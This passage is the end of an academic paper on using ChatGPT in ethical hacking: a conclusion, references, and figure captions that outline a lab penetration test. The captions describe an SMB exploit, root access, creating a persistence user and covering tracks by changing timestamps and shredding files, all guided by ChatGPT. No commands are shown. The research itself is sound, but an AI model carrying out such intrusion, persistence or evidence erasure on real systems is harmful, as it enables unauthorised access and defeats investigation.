with AI-driven tools. This includes tackling issues related to data biases, ensuring
transparency in AI decision-making processes, and enhancing AI’s adaptability
to evolving cyber threats. Continued research should focus on developing and
validating AI tools that can effectively balance automation with the necessary
human oversight. By doing so, the cybersecurity community can fully harness the
benefits of AI while safeguarding against emerging risks, ultimately contributing
to stronger and more resilient security defences.

References

1. Ahmed, T., Ghosh, S., Bansal, C., Zimmermann, T., Zhang, X., Rajmohan, S.:
Recommending root-cause and mitigation steps for cloud incidents using large
language models. In: Proceedings of 2023 IEEE/ACM 45th International Con-
ference on Software Engineering (ICSE). pp. 1737–1749. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10172904/
2. Al-Sinani, H., Mitchell, C.: Unleashing AI in ethical hacking: A prelimi-
nary experimental study. Technical report, Royal Holloway, University of Lon-
don (2024), https://pure.royalholloway.ac.uk/files/58692091/TechReport_
UnleashingAIinEthicalHacking.pdf
3. Al-Sinani, H.S., Mitchell, C.J., Sahli, N., Al-Siyabi, M.: Unleashing AI in ethical
hacking. In: Proceedings of the STM 2024, the 20th International Workshop on
Security and Trust Management (co-located with ESORICS 2024), Bydgoszcz,
Poland. p. to appear. LNCS, Springer (2024), https://www.chrismitchell.net/
Papers/uaieh.pdf
4. Bertino, E., Kantarcioglu, M., Akcora, C.G., Samtani, S., Mittal, S., Gupta,
M.: AI for security and security for AI. In: Joshi, A., Carminati, B., Verma,
12
https://owasp.org/www-project-top-ten/
13
https://owasp.org/www-project-mobile-top-10/
16 H. Al-Sinani & C. Mitchell

R.M. (eds.) CODASPY ’21: Eleventh ACM Conference on Data and Applica-
tion Security and Privacy, Virtual Event, USA, April 26–28, 2021. pp. 333–
334. ACM (2021). https://doi.org/10.1145/3422337.3450357, https://doi.
org/10.1145/3422337.3450357
5. Brown, T.B., et al.: Language models are few-shot learners. In: Larochelle,
H., Ranzato, M., Hadsell, R., Balcan, M., Lin, H. (eds.) Advances in
Neural Information Processing Systems 33: Annual Conference on Neu-
ral Information Processing Systems 2020, NeurIPS 2020, December 6–
12, 2020, virtual (2020), https://proceedings.neurips.cc/paper/2020/hash/
1457c0d6bfcb4967418bfb8ac142f64a-Abstract.html
6. Deng, G., Liu, Y., Mayoral-Vilches, V., Liu, P., Li, Y., Xu, Y., Zhang, T., Liu, Y.,
Pinzger, M., Rass, S.: PentestGPT: An LLM-empowered automatic penetration
testing tool (2023), https://arxiv.org/abs/2308.06782
7. Fujii, S., Yamagishi, R.: Feasibility study for supporting static malware analy-
sis using LLM. In: Proceedings of the SecAI 2024, the Workshop on Security
and Artificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland.
p. to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14EW8RJnE4QUBG0mIoMVM0chzJcp1nQon/view
8. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From ChatGPT to
ThreatGPT: Impact of generative AI in cybersecurity and privacy. IEEE Ac-
cess 11, 80218–80245 (2023). https://doi.org/10.1109/ACCESS.2023.3300381,
https://doi.org/10.1109/ACCESS.2023.3300381
9. Handa, A., Sharma, A., Shukla, S.K.: Machine learning in cybersecurity: A review.
WIREs Data Mining and Knowledge Discovery 9(4), e1306 (2019). https://doi.
org/10.1002/WIDM.1306, https://doi.org/10.1002/widm.1306
10. Harrison, J., Toreini, E., Mehrnezhad, M.: A practical deep learning-based acoustic
side channel attack on keyboards. In: IEEE European Symposium on Security and
Privacy, EuroS&P 2023 — Workshops, Delft, Netherlands, July 3-7, 2023. pp. 270–
280. IEEE (2023). https://doi.org/10.1109/EUROSPW59978.2023.00034, https:
//doi.org/10.1109/EuroSPW59978.2023.00034
11. Jiang, F., Xu, Z., Niu, L., Xiang, Z., Ramasubramanian, B., Li, B., Poovendran,
R.: ArtPrompt: ASCII art-based jailbreak attacks against aligned llms. Tech.
rep. (2024). https://doi.org/10.48550/ARXIV.2402.11753, https://doi.org/
10.48550/arXiv.2402.11753
12. Park, S., Lee, H., Cha, S.K.: Systematic bug reproduction with large language
model. In: Proceedings of the SecAI 2024, the Workshop on Security and Ar-
tificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland. p.
to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14dafpfhAnp9YLb9YIC4YbVJKwTPc_dQ3/view
13. Pearce, H., Tan, B., Ahmad, B., Karri, R., Dolan-Gavitt, B.: Examining zero-shot
vulnerability repair with large language models. In: Proceedings of 2023 IEEE
Symposium on Security and Privacy (SP). pp. 2339–2356. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10179324
14. Swanson, M., Bartol, N., Sabato, J., Hash, J., Graffo, L.: Technical guide to
information security testing and assessment (NIST SP 800-115). Special Publi-
cation 800-115, National Institute of Standards and Technology (2008), https:
//csrc.nist.gov/publications/detail/sp/800-115/final
15. Vaswani, A., Shazeer, N., Parmar, N., Uszkoreit, J., Jones, L., Gomez, A.N., Kaiser,
L., Polosukhin, I.: Attention is all you need. In: Guyon, I., von Luxburg, U.,
Bengio, S., Wallach, H.M., Fergus, R., Vishwanathan, S.V.N., Garnett, R. (eds.)
AI-Enhanced Ethical Hacking 17

Advances in Neural Information Processing Systems 30: Annual Conference on


Neural Information Processing Systems 2017, December 4–9, 2017, Long Beach,
CA, USA. pp. 5998–6008 (2017), https://proceedings.neurips.cc/paper/2017/
hash/3f5ee243547dee91fbd053c1c4a845aa-Abstract.html
18 H. Al-Sinani & C. Mitchell

A Appendix

Fig. 1. MacBook: the physical host

Fig. 2. MacBook size


AI-Enhanced Ethical Hacking 19

Fig. 3. VirtualBox & VMs


20 H. Al-Sinani & C. Mitchell

Fig. 4. The five ethical hacking stages

Fig. 5. Lab setup

Fig. 6. Designated IP address range


AI-Enhanced Ethical Hacking 21

Fig. 7. Static IP address assignment

Fig. 8. Reconnaissance

Fig. 9. Network scanning


22 H. Al-Sinani & C. Mitchell

Fig. 10. Kali IP address


AI-Enhanced Ethical Hacking 23

Fig. 11. Requesting ChatGPT to suggest commands for displaying default IP addresses
24 H. Al-Sinani & C. Mitchell

Fig. 12. Default IP addresses


AI-Enhanced Ethical Hacking 25

Fig. 13. Requesting ChatGPT to perform device-IP address mapping


26 H. Al-Sinani & C. Mitchell

Fig. 14. Device-IP address mapping


AI-Enhanced Ethical Hacking 27

Fig. 15. Key scanning commands


28 H. Al-Sinani & C. Mitchell

Fig. 16. The nmap command with key options


AI-Enhanced Ethical Hacking 29

Fig. 17. Nmap scan


30 H. Al-Sinani & C. Mitchell

Fig. 18. ChatGPT guides on verifying SMB version


AI-Enhanced Ethical Hacking 31

Fig. 19. SMB version confirmed


32 H. Al-Sinani & C. Mitchell

Fig. 20. Asking ChatGPT for vulnerability suggestions


AI-Enhanced Ethical Hacking 33

Fig. 21. ChatGPT suggests ‘trans2open‘


34 H. Al-Sinani & C. Mitchell

Fig. 22. Incompatible payload error


AI-Enhanced Ethical Hacking 35

Fig. 23. ChatGPT suggests a fix


36 H. Al-Sinani & C. Mitchell

Fig. 24. Applying ChatGPT’s fix

Fig. 25. Root access gained


AI-Enhanced Ethical Hacking 37

Fig. 26. Shell stabilisation and upgrade

Fig. 27. Using the bash-based terminal


38 H. Al-Sinani & C. Mitchell

Fig. 28. Meterpreter shell failure

Fig. 29. Consulting ChatGPT for guidance on maintaining persistent access


AI-Enhanced Ethical Hacking 39

Fig. 30. ChatGPT’s recommendations for maintaining access

Fig. 31. Creating a new user


40 H. Al-Sinani & C. Mitchell

Fig. 32. New user entry in /etc/passwd

Fig. 33. Setting up a new password

Fig. 34. New hash entry in /etc/shadow

Fig. 35. New user home directory


AI-Enhanced Ethical Hacking 41

Fig. 36. New user group membership

Fig. 37. SSH session


42 H. Al-Sinani & C. Mitchell

Fig. 38. Initial ChatGPT response on enabling public key authentication


AI-Enhanced Ethical Hacking 43

Fig. 39. Updated ChatGPT response on enabling public key authentication


44 H. Al-Sinani & C. Mitchell

Fig. 40. Corrected ChatGPT response for enabling public key authentication
AI-Enhanced Ethical Hacking 45

Fig. 41. Consulting ChatGPT for advice on covering tracks


46 H. Al-Sinani & C. Mitchell

Fig. 42. ChatGPT’s recommendations for covering tracks


AI-Enhanced Ethical Hacking 47

Fig. 43. Consulting ChatGPT about modifying timestamps


48 H. Al-Sinani & C. Mitchell

Fig. 44. Modifying timestamps

Fig. 45. Consulting ChatGPT on using ‘shred’


AI-Enhanced Ethical Hacking 49

Fig. 46. Shredding files to erase evidence


50 H. Al-Sinani & C. Mitchell

Fig. 47. Key sections of PenTest report — part 1


AI-Enhanced Ethical Hacking 51

Fig. 48. Key sections of PenTest report — part 2


52 H. Al-Sinani & C. Mitchell

Fig. 49. Request to ChatGPT for a PenTest report draft based on provided details
AI-Enhanced Ethical Hacking 53

Fig. 50. ChatGPT-produced PenTest report — part 1


54 H. Al-Sinani & C. Mitchell

Fig. 51. ChatGPT-produced PenTest report — part 2


AI-Enhanced Ethical Hacking 55

Fig. 52. ChatGPT-produced PenTest report — part 3


56 H. Al-Sinani & C. Mitchell

Fig. 53. ChatGPT-produced PenTest report — part 4

You might also like